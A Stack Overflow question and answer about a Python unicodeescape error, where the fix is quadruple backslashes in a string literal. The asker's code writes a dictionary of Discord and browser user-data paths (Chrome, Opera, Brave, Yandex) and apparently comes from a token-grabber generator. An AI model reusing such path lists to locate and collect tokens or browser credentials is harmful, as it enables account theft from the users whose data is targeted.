# SyntaxError: (unicode error) `unicodeescape` codec can't decode bytes in position 55-56: truncated \UXXXXXX escape ( CLOSED )

Tags: python, unicode, syntax, path, unicode-escapes

I have this error and i can't fix it. Please help me.! [(Image of the error.)](https://i.stack.imgur.com/PASkd.png)

Code:

```
    grb.write('PATHS = {\n')
    grb.write('    "Discord"           : ROAMING + "\\\Discord",\n')
    grb.write('    "Discord Canary"    : ROAMING + "\\\discordcanary",\n')
    grb.write('    "Discord PTB"       : ROAMING + "\\\discordptb",\n')
    grb.write('    "Google Chrome"     : LOCAL + "\\\Google\\\Chrome\\\User Data\\\Default",\n')
    grb.write('    "Opera"             : ROAMING + "\\\Opera Software\\\Opera Stable",\n')
    grb.write('    "Brave"             : LOCAL + "\\\BraveSoftware\\\Brave-Browser\\\User Data\\\Default",\n')
    grb.write('    "Yandex"            : LOCAL + "\\\Yandex\\\YandexBrowser\\\User Data\\\Default"\n')
    grb.write('}\n')
```

Im expecting someone to help me with this.

Comment: Why do you use _triple_ reverse solidus? `\U` literal has a particular meaning in Python [String and Bytes literals](https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals)

Comment: because its .wirite and \\ in .write = \ so i had to add one more \

Comment: so i should do \U instead of \\\ ?

Comment: Use _double_ backslash; then you get ```\```, e.g. as in `print("\\Google\\Chrome\\User Data\\Default")` which returns `\Google\Chrome\User Data\Default`

Comment: yah, but i wan't it to return double backslash

Comment: Then use _quadruple_ backslash to get ```\\``` as in `print("\\\\Google\\\\Chrome\\\\User Data\\\\Default")` -> `\\Google\\Chrome\\User Data\\Default`

Comment: alright, i'll try and see if it gonna work

Comment: ty bro it works

Answer (score 2):

If you want a *double backslash* in output, use quadruple backslash (`\\\\`) in a string literal to get `\\`, e.g. as follows (apply `grb.write` instead of `print`):

```
print('    "Google Chrome"     : LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",\n')
```

> ```
>     "Google Chrome"     : LOCAL + "\\Google\\Chrome\\User Data\\Default",
> ```

**Explanation**: [String and Bytes literals](https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals)

> … The backslash (`\`) character is used to escape characters that
> otherwise have a special meaning, such as newline, *backslash itself*,
> or the quote character. …
>
> Unless an `r` or `R` prefix is present, escape sequences in string and
> bytes literals are interpreted according to rules similar to those
> used by Standard C. The recognized escape sequences are:
>
> ```
> Escape Sequence  Meaning                         Notes
> \newline         Backslash and newline ignored
> \\               Backslash (\)
> \'               Single quote (')
> \"               Double quote (")
> \a               ASCII Bell (BEL)                \x07
> \b               ASCII Backspace (BS)            \x08
> \f               ASCII Formfeed (FF)             \x0c
> \n               ASCII Linefeed (LF)             \x0a
> \r               ASCII Carriage Return (CR)      \x0d
> \t               ASCII Horizontal Tab (TAB)      \x09
> \v               ASCII Vertical Tab (VT)         \x0b
> \ooo             Character with octal value ooo  (1,3)
> \xhh             Character with hex value hh     (2,3)
> ```
>
> Escape sequences only recognized in string literals are:
>
> ```
> Escape Sequence  Meaning                                      Notes
>
> \N{name}         Character named name in the Unicode database (4)
> \uxxxx           Character with 16-bit hex value xxxx         (5)
> \Uxxxxxxxx       Character with 32-bit hex value xxxxxxxx     (6)
> ```
>
> Notes:
>
> 1. As in Standard C, up to three octal digits are accepted.
> 2. Unlike in Standard C, exactly two hex digits are required.
> 3. In a bytes literal, hexadecimal and octal escapes denote the byte with the given value. In a string literal, these escapes denote a
>    Unicode character with the given value.
> 4. Changed in version 3.3: Support for name aliases 1 has been added.
> 5. Exactly four hex digits are required.
> 6. Any Unicode character can be encoded this way. Exactly eight hex digits are required.
>
> Unlike Standard C, all unrecognized escape sequences are left in the
> string unchanged, i.e., the backslash is left in the result.